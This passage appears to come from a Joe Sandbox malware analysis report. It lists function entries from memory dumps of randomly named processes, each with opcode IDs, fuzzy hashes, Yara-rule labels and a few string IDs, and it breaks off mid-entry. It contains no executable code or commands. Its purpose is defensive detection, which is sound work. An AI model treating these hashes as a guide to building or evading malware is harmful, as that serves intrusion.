                                                          • Opcode Fuzzy Hash: b72fb3ee4c4874d281bf465eb206aa26e7d75ac672da61a2efb48afe050a9171
                                                          • Instruction Fuzzy Hash: B3018434A0D389CFE712DBA484941DDBFF0AF02314F1542E7C445DB1A6EA345A44C741
                                                          Function 00007FFD9B76560A Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1808816483.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b760000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction ID: d5940cba146c16b0edbbff5cba370d03bd6ce0b60e81d7c16d2ee0218abce3f2
                                                          • Opcode Fuzzy Hash: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction Fuzzy Hash: 7DF0B434A0D3068BF3549284C4603A97394DF44310F154279E90E976F2CD286E818705
                                                          Function 00007FFD9B760B95 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1808816483.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b760000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction ID: 428e5cf728696dce690f4856f8b083968de8d78956b2ef141a538e12728ca06b
                                                          • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction Fuzzy Hash: CDD0A930229A4E8FDA00B77CC88A8247BA0FB0F210FCA10E1E008C75B2E60888A98701
                                                          Function 00007FFD9B7606AD Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1808816483.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b760000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction ID: 7aa13856ce0a2509d84b223f6b7d9800c3bd03e1d9bb254b1f2fc03e76ca40f3
                                                          • Opcode Fuzzy Hash: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction Fuzzy Hash: 66C08C00F1FB0F88E43931EE18A20ADB2004BD4A20FD30333C00E400B99C8E22C50147
                                                          Function 00007FFD9B7612D8 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1808816483.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b760000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction ID: 60a0e5e1c8d7b5a6b202f2686d5bc9aadee0aa8c3ef373c70128c864d5324f46
                                                          • Opcode Fuzzy Hash: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction Fuzzy Hash: 33C08C3051190E8FC908EB28C88480433A0FB19200BC60090E009C7170E219DCC2C741
                                                          Function 00007FFD9B761CF0 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1808816483.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b760000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ccbe39ccc839f2303c1fed942fb1a26de912b4496e7ca24189b40f117639692
                                                          • Instruction ID: 4277cf93421cc1479854c7e017e8ea245bcd5e94446854054f95e84cfb7149ec
                                                          • Opcode Fuzzy Hash: 5ccbe39ccc839f2303c1fed942fb1a26de912b4496e7ca24189b40f117639692
                                                          • Instruction Fuzzy Hash: 12C08C00F1CC1ECAF3263248443067D00025B80304F804270E00FC6BDECC0C2E020287
                                                          Function 00007FFD9B7606D0 Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1808816483.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b760000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction ID: 9954da747b3cbc66ae4111696fbf3128a3121ce625bc8014a52c081f31b1a927
                                                          • Opcode Fuzzy Hash: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction Fuzzy Hash: 7AB01200D67A0F44E42C31FA0C930A570405B45110FC20271D40C401B5988D12D40243
                                                          Function 00007FFD9B762279 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1808816483.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b760000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction ID: 40b2424d629d52a5a1b661e9f1945f0f4cbe76ec9a5c50cdff945eeebb00e634
                                                          • Opcode Fuzzy Hash: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction Fuzzy Hash: 2AB09226E1A31D8AE32892A0C4A02FE31520F54310F5AC6B2900F264F59C282B85A682

                                                          Non-executed Functions

                                                          Function 00007FFD9B7609B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1808816483.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b760000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: c9$!k9$"s9$#{9
                                                          • API String ID: 0-1692736845
                                                          • Opcode ID: 7d3d3813d2832680f919a1eb8dad22e046d9d882407aec6603a8ea0be96761e5
                                                          • Instruction ID: 64c247a061f9dbaf3eeeec25e4f953c5262b04e3ca876d3ee7696a10906bc4ce
                                                          • Opcode Fuzzy Hash: 7d3d3813d2832680f919a1eb8dad22e046d9d882407aec6603a8ea0be96761e5
                                                          • Instruction Fuzzy Hash: B441DE0FB8D5274DE21932FD71619FC6B469FA1278B0846B7F16ECD0DB8E08248586E5

                                                          Executed Functions

                                                          Function 00007FFD9B780D47 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 5Y_H
                                                          • API String ID: 0-3237497481
                                                          • Opcode ID: c0edf2a2b9d3ce1a0004f0c0b02f945874dd20dc89b1c9ec7da9c1ff5e4cee45
                                                          • Instruction ID: 825777e974347848aa14fbb051eb23aa50887f4b452841a82442f06312c47370
                                                          • Opcode Fuzzy Hash: c0edf2a2b9d3ce1a0004f0c0b02f945874dd20dc89b1c9ec7da9c1ff5e4cee45
                                                          • Instruction Fuzzy Hash: 47910276A19A8D8FE799DF6888697E97FE1FF66305F0002BAD049C72E6DE781410C701
                                                          Function 00007FFD9B780998 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H
                                                          • API String ID: 0-2852464175
                                                          • Opcode ID: 4c0c03b4604117b250527fbc468786d0c4fb0cb5c459c057434ebb2f06f40937
                                                          • Instruction ID: 3cce5b395ff01ad3dffd1b86a29dbd2cda2696bc0575a03d59520dce08b44d27
                                                          • Opcode Fuzzy Hash: 4c0c03b4604117b250527fbc468786d0c4fb0cb5c459c057434ebb2f06f40937
                                                          • Instruction Fuzzy Hash: AA31E424B19E0D0FE798E76C94BA6B937D2EB99316F4101B9E40DC32F6DD28EC418345
                                                          Function 00007FFD9B78116D Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H
                                                          • API String ID: 0-2852464175
                                                          • Opcode ID: 59b3c6dfe0516177142f3282225f646c76a5fcfe0251109ac5f29cc8cf0167e8
                                                          • Instruction ID: 0d050b5739b7bf90d69431be7b980e7f6ae799a9aded5bed9ca0c437d4b7bc78
                                                          • Opcode Fuzzy Hash: 59b3c6dfe0516177142f3282225f646c76a5fcfe0251109ac5f29cc8cf0167e8
                                                          • Instruction Fuzzy Hash: 81316430E09A4D8FDB45EBA4C8A4AB977F0FF59301F0546BAD009D71B2DA38A944C750
                                                          Function 00007FFD9B780908 Relevance: .1, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction ID: 34b20c2f54227a925371e3e52f426af9c15f873fae4c998717b44a7f8a130e19
                                                          • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction Fuzzy Hash: 0521EA3130DD184FE768EA5CE889DB977D1EF9932171501BAE58EC7135E921EC8287C1
                                                          Function 00007FFD9B780C25 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f6a1cee0088d68508ee7bb56a643eee45ff31ad4ab083cf362f675c9a52cdfa
                                                          • Instruction ID: b1bc3fdee8600245938d5601dcad0d9bc0101b5f8174f678f35e8a96cf638222
                                                          • Opcode Fuzzy Hash: 6f6a1cee0088d68508ee7bb56a643eee45ff31ad4ab083cf362f675c9a52cdfa
                                                          • Instruction Fuzzy Hash: 3321B935B0DB8D8FE721DB6888A51EC7FA0EF52311F1546FBD054871F2DA3826458741
                                                          Function 00007FFD9B784C28 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 89ff0e0e47d14d8e1a5764c4221d0d45fa824f228dfa4e40059919c1b0c5e734
                                                          • Instruction ID: 35049095326d70aa496512f96236bbc9a552cd8c090ee5ce5bde88481f679557
                                                          • Opcode Fuzzy Hash: 89ff0e0e47d14d8e1a5764c4221d0d45fa824f228dfa4e40059919c1b0c5e734
                                                          • Instruction Fuzzy Hash: 50215E21B19E1E4FE7B4E75888B96B87392FF84311F1602B9E40ED76F2DE386E414640
                                                          Function 00007FFD9B782BF9 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1d1da1760d5306188f0891364103b00cd0c239016288e81fcbb0c7e986a49689
                                                          • Instruction ID: ad33170190f9c250a99c3f06aa797e759062a58519bc046375f5102515c2b1b3
                                                          • Opcode Fuzzy Hash: 1d1da1760d5306188f0891364103b00cd0c239016288e81fcbb0c7e986a49689
                                                          • Instruction Fuzzy Hash: A3115730A09E0D8FDB68DB48C490BA973F1FB58305F5142A9D04ED72B5CA74AA80CB45
                                                          Function 00007FFD9B784D1E Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c0e7302252a2634fc998e7394e1dbf4f08b1f72595603214b53fbfb1d9ad9e1
                                                          • Instruction ID: fd01b24cb407dfc5d7640c2717112a364d67733803710e3d2f9b09cf31ce461a
                                                          • Opcode Fuzzy Hash: 9c0e7302252a2634fc998e7394e1dbf4f08b1f72595603214b53fbfb1d9ad9e1
                                                          • Instruction Fuzzy Hash: 2A110321B09E0D4BEBA4E66888E96B873E2FF94342F1701BDD00ED72F2DD786A414604
                                                          Function 00007FFD9B780C38 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bb0da6a46d4b284f971977a24772ad0f3cf71952490efb496d7a76abeeff8f5f
                                                          • Instruction ID: 2e38703c29142a61fa252b8a39681d6c79e9074dc4c8b36c25cb3b1b83aa0859
                                                          • Opcode Fuzzy Hash: bb0da6a46d4b284f971977a24772ad0f3cf71952490efb496d7a76abeeff8f5f
                                                          • Instruction Fuzzy Hash: F4118635B0EB8D8FE712DB6898A51EC7FB0EF52211F1646F7C484DB1E2D93416498781
                                                          Function 00007FFD9B780C40 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 23a8a7d32beeb55120a499870c0f04a1bd7d4f728746e43c8beaf3061e686c84
                                                          • Instruction ID: 7e7458c80985b8e4f0945d7dbd4c815da9c231f5767b950c77639bed8fac47bf
                                                          • Opcode Fuzzy Hash: 23a8a7d32beeb55120a499870c0f04a1bd7d4f728746e43c8beaf3061e686c84
                                                          • Instruction Fuzzy Hash: E9016135A0EB8C8FE712DB6488A41DDBFB0EF52211F1646EBC485DB1E2DA3456498B81
                                                          Function 00007FFD9B784CE3 Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction ID: 5f4a9e9009faadc229a886ba962064a22a19c0a60235ae16323da3e99fa88289
                                                          • Opcode Fuzzy Hash: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction Fuzzy Hash: 68F03630B19D1D8EEB64EA54D8E56F873A1FF54312F1601FDD00ED36B1DD786A814A04
                                                          Function 00007FFD9B780C50 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 27204e0678c9fe9de8d125915eb7b8bb1059bd83c89202b1961172c7450f7150
                                                          • Instruction ID: 00bbdaf113da6d1a47c76f7260f8b7c5db667e7490eae7c43f01a6ee9f3c926f
                                                          • Opcode Fuzzy Hash: 27204e0678c9fe9de8d125915eb7b8bb1059bd83c89202b1961172c7450f7150
                                                          • Instruction Fuzzy Hash: 84018434A0D7888FD722DB6484A41DDBFB0EF02315F1542EBC484CB1E2D9345644C741
                                                          Function 00007FFD9B78560A Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction ID: 3580c29ad3ccb5f3a0262292cb9573ff8a19a8320590946b1769814dce3b624d
                                                          • Opcode Fuzzy Hash: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction Fuzzy Hash: 3CF08230A0960A4BF7A09688C4A17E97394EF88310F1242B9E94E977E2DE3C6E81C745
                                                          Function 00007FFD9B780B95 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction ID: 9c82c6be84d2680ad6f18f3ecb797aa6ae1abb0a02db453558324f7f2cb2e967
                                                          • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction Fuzzy Hash: BFD0A930629A4E8FDA01B778C88A8247BA0FB0F211FCA10E1E008C71B2D61888A98700
                                                          Function 00007FFD9B7806AD Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction ID: fb6a0e738759d443d483a3f8091ac49afb5a4f69f5465b0c9cfa28ac93282ba7
                                                          • Opcode Fuzzy Hash: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction Fuzzy Hash: BEC00205F5BF5F01E46531AA58A60ADB2405FC4A26FE31273D50D801B1986E22D64196
                                                          Function 00007FFD9B7812D8 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction ID: 6013e772606c756823daabf6aee8ea91ea850f676bf1bbcf8e8749d80422b918
                                                          • Opcode Fuzzy Hash: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction Fuzzy Hash: E1C08C30511D0E8FC908EB28C88480433A0FB19201BC20090E009C7170E229DCC2C740
                                                          Function 00007FFD9B781CF0 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: efd9925a4714970447af2ebff286693f80e5063bede7195698d6f81ae9646031
                                                          • Instruction ID: dff69d8f712a8c80fb93b3fe5ef4f57136ed78c1117d0738f5cf01e26651aeed
                                                          • Opcode Fuzzy Hash: efd9925a4714970447af2ebff286693f80e5063bede7195698d6f81ae9646031
                                                          • Instruction Fuzzy Hash: 5CC08C00F18C1E8AF32A724404306BD04025B84308F904270E00F86BCECC1C2E02028B
                                                          Function 00007FFD9B7806D0 Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction ID: 77cc721939f5cfd92a63225049206c4e660550797244399cb29935e19bc662a5
                                                          • Opcode Fuzzy Hash: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction Fuzzy Hash: 2EB01200D57E0F00E42431FA0CD20A570405F44211FC30271D40C801B1985E12D50282
                                                          Function 00007FFD9B782279 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction ID: 54eb439320f8a02e73232ac22f73b763ce7037b18a156cde748ab09203aea64f
                                                          • Opcode Fuzzy Hash: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction Fuzzy Hash: 62B09222E1AB1D42E32496A084A02FA32520F48311FABC6B2900F264E18C382B859680

                                                          Non-executed Functions

                                                          Function 00007FFD9B7809B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000019.00000002.1869917996.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_25_2_7ffd9b780000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: c9$!k9$"s9$#{9
                                                          • API String ID: 0-1692736845
                                                          • Opcode ID: 77d223a0528defc6a658e0d448f9167d13dfc1d48850c5f1d4df1b48ca8182b6
                                                          • Instruction ID: 6e2696d2ce131cfcd50b818bd7740e4785d4c93133ab7c373deed7cb11ac3e9b
                                                          • Opcode Fuzzy Hash: 77d223a0528defc6a658e0d448f9167d13dfc1d48850c5f1d4df1b48ca8182b6
                                                          • Instruction Fuzzy Hash: E941B00BB8E56A4DE31933FD75619FC6B468FA1335B0843F7F06E890D74E18608186E5

                                                          Executed Functions

                                                          Function 00007FFD9B790D47 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 5X_H
                                                          • API String ID: 0-3241812158
                                                          • Opcode ID: 6a933fa5f3b7a1396c637612b6c65c310c111f9a0de27b3e3926405fa9cd4959
                                                          • Instruction ID: a81b1484c07ea20e021479294a07328f044fff38c122023656123eed91483987
                                                          • Opcode Fuzzy Hash: 6a933fa5f3b7a1396c637612b6c65c310c111f9a0de27b3e3926405fa9cd4959
                                                          • Instruction Fuzzy Hash: D791D475A29A8D8FE759DF6888657A87FE1FFA5304F4001BEE009C72E6DB792410C740
                                                          Function 00007FFD9B79116D Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H
                                                          • API String ID: 0-2852464175
                                                          • Opcode ID: caa490a2e56088051fc2f370afcd9abbd1089abe18a905042b046d3c003e9098
                                                          • Instruction ID: 491d9c946b02118ae49c0227fb9582fbca0f25f049f0f36d6f4fb5318743d686
                                                          • Opcode Fuzzy Hash: caa490a2e56088051fc2f370afcd9abbd1089abe18a905042b046d3c003e9098
